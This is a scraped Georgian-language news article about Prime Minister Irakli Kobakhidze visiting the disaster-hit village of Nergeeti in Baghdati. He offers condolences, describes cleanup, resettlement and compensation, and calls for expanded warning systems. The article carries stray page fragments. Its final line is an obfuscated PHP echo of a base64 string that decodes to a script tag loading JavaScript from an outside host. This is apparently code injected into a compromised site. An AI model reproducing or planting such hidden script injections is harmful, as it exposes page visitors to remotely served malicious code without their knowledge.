celsiusi
ავერსი შნაიდერი

საქართველოს პრემიერ-მინისტრი ირაკლი კობახიძე ბაღდათში, სოფელ ნერგეეთში, სტიქიის ზონაში ჩავიდა.

ირაკლი კობახიძემ სტიქიის შედეგად დაღუპულების ოჯახის წევრებს მიუსამძიმრა.

„ძალიან დიდი ტრაგედია მოხდა, მივუსამძიმრეთ დაღუპულების ოჯახის წევრებს. გავეცანით ვითარებას. მიმდინარეობს სტიქიის შედეგების სალიკვიდაციო სამუშაოები“, – განაცხადა კობახიძემ.

მისივე თქმით, მთავარია, თითოეული ადამიანი, ოჯახი იყოს მაქსიმალურად უზრუნველყოფილი სათანადო პირობებით.

როგორც კობახიძემ აღნიშნა, ადგილობრივი ხელისუფლება ოჯახების უზრუნველსაყოფად ყველაფერს გააკეთებს.

„ვიყავით სტიქიის, ტრაგედიის ადგილზე. გავეცანით ადგილზე ვითარებას. როგორც იცით, მიმდინარეობს სტიქიის შედეგების სალიკვიდაციო სამუშაოები. სოფელ ნერგეეთში საჭიროა განსახლება და კომპენსაციები, ამასთან დაკავშირებითაც იქნება ზომები მიღებული. სტიქიის შედეგების სალიკვიდაციო სამუშაოები დასრულდება დღეს, ხვალ. სწრაფი ტემპით მიმდინარეობდა ეს ყველაფერი. ვუსამძიმრებ კიდევ ერთხელ სოფლის მოსახლეობას, პირადად მოვუსამძიმრეთ დაღუპულების ოჯახის წევრებს. ძალიან დიდი ტრაგედია მოხდა.

 

რაც შეეხება პრევენციას, ყველაფერი გაკეთდება სამომავლოდ, რათა მაქსიმალურად ვიზრუნოთ ასეთი შემთხვევების პრევენციაზე. ვერავითარი ზომა ვერ იქნება პანაცეა. ამ შემთხვევაშიც იყო ძალიან რთული შემთხვევა, თუმცა ზოგადად, ყველა ზომა იქნება მიღებული იმისათვის, რომ მოხდეს ნებისმიერი ტიპის ბუნებრივი კატასტროფის პრევენცია, სადაც ეს შესაძლებელია“, – განაცხადა კობახიძემ.

დამატებით შეტყობინებების სისტემების შეძენასთან დაკავშირებულ კითხვაზე, ირაკლი კობახიძემ აღნიშნა, რომ რაც შეიძლება მეტად უნდა გაფართოვდეს დაკვირვების, გაფრთხილების სისტემები.

„კიდევ ერთხელ გავიმეორებ, სადაც იქნება შესაძლებელი პრევენცია, იქ მაქსიმალური ზომები უნდა იყოს მიღებული და რა თქმა უნდა, ეს სისტემები უნდა გაფართოვდეს“, – განაცხადა კობახიძემ.

200
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");